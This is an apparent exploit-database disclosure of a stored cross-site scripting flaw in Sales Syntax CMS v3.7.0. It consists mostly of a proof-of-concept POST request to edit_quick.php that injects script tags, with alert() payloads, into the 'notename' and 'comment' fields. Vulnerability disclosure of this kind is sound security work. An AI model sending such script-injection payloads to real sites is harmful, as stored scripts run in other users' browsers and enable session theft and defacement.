# Exploit Title: Sales Syntax CMS - Stored Cross-Site Scripting
# Google Dork: N/A
# Date: 2025-09-06 [YYYY/MM/DD]
# Exploit Author: Erdinç ODABAŞ
# Vendor Homepage: www.salessyntax.net
# Vulnerable Software --> [ https://www.salessyntax.net/salessyntax-3.7.0.zip ]
# Affected Version: [ v3.7.0 ]
# CVE-ID: N/A
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: comment
# Attack Pattern: <script>alert("Erdinc")</script>
# Description
Allows it to run a Cross-Site Scripting by saving a new title from the "Edit Canned Responses" tab.
# Proof of Concepts:
POST /Sales_Syntaxrr6lw68y2d/edit_quick.php HTTP/1.1
Host: 127.0.0.1
Cookie: AEFCookies1526[aefsid]=55imd0pwmt8zvnahftzwuxanrnq0kcav; demo_523=%7B%22sid%22%3A523%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FCotontimx82untgbn%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2F127.0.0.1%5C%2FCotontimx82untgbn%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22mx82untgbn%22%7D; cslhOPERATOR=fe8e5a645d3ba40dd9c8b0439314d338
Content-Length: 216
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="139", "Not;A=Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: tr-TR,tr;q=0.9
Origin: https://127.0.0.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: frame
Referer: https://127.0.0.1/Sales_Syntaxrr6lw68y2d/edit_quick.php?action=edit&typeof=
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive
typing=no&user_id=1&alt_what=&typeof=&timeof=20250906222448&editid=0¬ename=%3Cscript%3Ealert%28%27Erdinc%27%29%3C%2Fscript%3E&visiblity=Private&comment=%3Cscript%3Ealert%28%27Erdinc2%27%29%3C%2Fscript%3E&what=SAVE